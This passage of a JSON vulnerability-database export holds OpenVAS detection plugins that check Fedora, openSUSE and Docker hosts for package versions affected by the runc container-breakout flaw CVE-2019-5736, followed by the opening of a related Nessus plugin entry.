ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876767\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:06 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for lxcfs FEDORA-2019-c1dac1b3b8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-c1dac1b3b8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/744HVBCKN5JUL3CHQ24OQUR76WXCYQ2W\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lxcfs'\n package(s) announced via the FEDORA-2019-c1dac1b3b8 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"LXCFS is a simple userspace filesystem designed to work around some\ncurrent limitations of the Linux kernel.\n\nSpecifically, it', s providing two main things\n\n - A set of files which can be bind-mounted over their /proc originals\n to provide CGroup-aware values.\n\n - A cgroupfs-like tree which is container aware.\n\nThe code is pretty simple, written in C using libfuse.\n\nThe main driver for this work was the need to run systemd based\ncontainers as a regular unprivileged user while still allowing systemd\ninside the container to interact with cgroups.\n\nNow with the introduction of the cgroup namespace in the Linux kernel,\nthat part is no longer necessary on recent kernels and focus is now on\nmaking containers feel more like a real independent system through the\nproc masking feature.\");\n\n script_tag(name:\"affected\", value:\"'lxcfs' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"lxcfs\", rpm:\"lxcfs~3.0.4~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875706", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875706", "type": "openvas", "title": "Fedora Update for runc FEDORA-2019-bc70b381ad", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875706\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:17:06 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for runc FEDORA-2019-bc70b381ad\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-bc70b381ad\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V6A4OSFM5GGOWW4ECELV5OHX2XRAUSPH\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'runc'\n package(s) announced via the FEDORA-2019-bc70b381ad advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The runc command can be used to start containers which are packaged\nin accordance with the Open Container Initiative', s specifications,\nand to manage containers running under runc.\");\n\n script_tag(name:\"affected\", value:\"'runc' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"runc\", rpm:\"runc~1.0.0~92.dev.gitc1b8c57.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:49:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876762", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876762", "type": "openvas", "title": "Fedora Update for python3-lxc FEDORA-2019-2baa1f7b19", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876762\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:04 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for python3-lxc FEDORA-2019-2baa1f7b19\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2baa1f7b19\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T4BDBZKL32NRG5KB5JVVWTKDPNXUNGA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python3-lxc'\n package(s) announced via the FEDORA-2019-2baa1f7b19 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Linux Resource Containers provide process and resource isolation\nwithout the overhead of full virtualization.\n\nThe python3-lxc package contains the Python3\nbinding for LXC.\");\n\n script_tag(name:\"affected\", value:\"'python3-lxc' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"python3-lxc\", rpm:\"python3-lxc~3.0.4~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T16:48:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-02-19T00:00:00", "id": "OPENVAS:1361412562310852299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852299", "type": "openvas", "title": "openSUSE: Security Advisory for docker-runc (openSUSE-SU-2019:0201-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852299\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-02-19 04:06:06 +0100 (Tue, 19 Feb 2019)\");\n script_name(\"openSUSE: Security Advisory for docker-runc (openSUSE-SU-2019:0201-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0201-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-02/msg00044.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'docker-runc'\n package(s) announced via the openSUSE-SU-2019:0201-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for docker-runc fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\n avoid write attacks to the host runc binary, which could lead to a\n container breakout (bsc#1121967)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-201=1\");\n\n script_tag(name:\"affected\", value:\"docker-runc on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc\", rpm:\"docker-runc~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-debuginfo\", rpm:\"docker-runc-debuginfo~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-debugsource\", rpm:\"docker-runc-debugsource~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic\", rpm:\"docker-runc-kubic~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic-debuginfo\", rpm:\"docker-runc-kubic-debuginfo~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic-debugsource\", rpm:\"docker-runc-kubic-debugsource~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic-test\", rpm:\"docker-runc-kubic-test~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-test\", rpm:\"docker-runc-test~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2019-02-21T00:00:00", "id": "OPENVAS:1361412562310875472", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875472", "type": "openvas", "title": "Fedora Update for runc FEDORA-2019-963ea958f9", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875472\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-21 04:08:23 +0100 (Thu, 21 Feb 2019)\");\n script_name(\"Fedora Update for runc FEDORA-2019-963ea958f9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-963ea958f9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SJZZZT46EQOOI7MJTJQW7VNJLTCGZOLU\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'runc'\n package(s) announced via the FEDORA-2019-963ea958f9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"runc on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"runc\", rpm:\"runc~1.0.0~68.dev.git6635b4f.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:48:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876768", "type": "openvas", "title": "Fedora Update for lxcfs FEDORA-2019-2baa1f7b19", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876768\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:07 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for lxcfs FEDORA-2019-2baa1f7b19\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2baa1f7b19\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EGZKRCKI3Y7FMADO2MENMT4TU24QGHFR\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lxcfs'\n package(s) announced via the FEDORA-2019-2baa1f7b19 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"LXCFS is a simple userspace filesystem designed to work around some\ncurrent limitations of the Linux kernel.\n\nSpecifically, it', s providing two main things\n\n - A set of files which can be bind-mounted over their /proc originals\n to provide CGroup-aware values.\n\n - A cgroupfs-like tree which is container aware.\n\nThe code is pretty simple, written in C using libfuse.\n\nThe main driver for this work was the need to run systemd based\ncontainers as a regular unprivileged user while still allowing systemd\ninside the container to interact with cgroups.\n\nNow with the introduction of the cgroup namespace in the Linux kernel,\nthat part is no longer necessary on recent kernels and focus is now on\nmaking containers feel more like a real independent system through the\nproc masking feature.\");\n\n script_tag(name:\"affected\", value:\"'lxcfs' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"lxcfs\", rpm:\"lxcfs~3.0.4~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "runc through 1.0-rc6, as used in Docker, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as\nroot within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an\nexisting container, to which the attacker previously had write access, that can be attached with docker exec.\nThis occurs because of file-descriptor mishandling, related to /proc/self/exe.", "modified": "2019-02-22T00:00:00", "published": "2019-02-14T00:00:00", "id": "OPENVAS:1361412562310141997", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141997", "type": "openvas", "title": "Docker < 18.09.2 runc Command Execution Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:docker:docker';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141997\");\n script_version(\"$Revision: 13828 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-22 10:35:28 +0100 (Fri, 22 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-14 11:54:46 +0700 (Thu, 14 Feb 2019)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_bugtraq_id(106976);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Docker < 18.09.2 runc Command Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_docker_remote_detect.nasl\", \"gb_docker_service_detection_lsc.nasl\");\n script_mandatory_keys(\"docker/version\");\n\n script_tag(name:\"summary\", value:\"runc through 1.0-rc6, as used in Docker, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as\nroot within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an\nexisting container, to which the attacker previously had write access, that can be attached with docker exec.\nThis occurs because of file-descriptor mishandling, related to /proc/self/exe.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Docker prior version 18.09.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 18.09.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://docs.docker.com/engine/release-notes/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"18.09.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"18.09.2\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-03T04:46:29", "description": "This update for containerd, docker, docker-runc,\ngolang-github-docker-libnetwork fixes the following issues :\n\nDocker :\n\n - CVE-2019-14271: Fixed a code injection if the nsswitch\n facility dynamically loaded a library inside a chroot\n (bsc#1143409).\n\n - CVE-2019-13509: Fixed an information leak in the debug\n log (bsc#1142160).\n\n - Update to version 19.03.1-ce, see changelog at\n /usr/share/doc/packages/docker/CHANGELOG.md\n (bsc#1142413, bsc#1139649).\n\nrunc :\n\n - Use %config(noreplace) for /etc/docker/daemon.json\n (bsc#1138920).\n\n - Update to runc 425e105d5a03, which is required by Docker\n (bsc#1139649).\n\ncontainerd :\n\n - CVE-2019-5736: Fixed a container breakout vulnerability\n (bsc#1121967).\n\n - Update to containerd v1.2.6, which is required by docker\n (bsc#1139649).\n\ngolang-github-docker-libnetwork :\n\n - Update to version\n git.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is\n required by docker (bsc#1142413, bsc#1139649).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "edition": 16, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-08-30T00:00:00", "title": "openSUSE Security Update : containerd / docker / docker-runc / etc (openSUSE-2019-2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10892", "CVE-2019-13509", "CVE-2019-14271", "CVE-2019-5736"], "modified": "2019-08-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:containerd", "cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:docker-runc-debuginfo", "p-cpe:/a:novell:opensuse:docker", "p-cpe:/a:novell:opensuse:docker-test", "p-cpe:/a:novell:opensuse:containerd-ctr", "p-cpe:/a:novell:opensuse:golang-github-docker-libnetwork", "p-cpe:/a:novell:opensuse:docker-libnetwork-debuginfo", "p-cpe:/a:novell:opensuse:docker-test-debuginfo", "p-cpe:/a:novell:opensuse:docker-zsh-completion", "p-cpe:/a:novell:opensuse:docker-libnetwork", "p-cpe:/a:novell:opensuse:docker-runc", "p-cpe:/a:novell:opensuse:docker-debuginfo", "p-cpe:/a:novell:opensuse:docker-bash-completion"], "id": "OPENSUSE-2019-2021.NASL", "href": "https://www.tenable.com/plugins/nessus/128409", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2021.\n#\n# The text description of this plugin is (C) SUSE 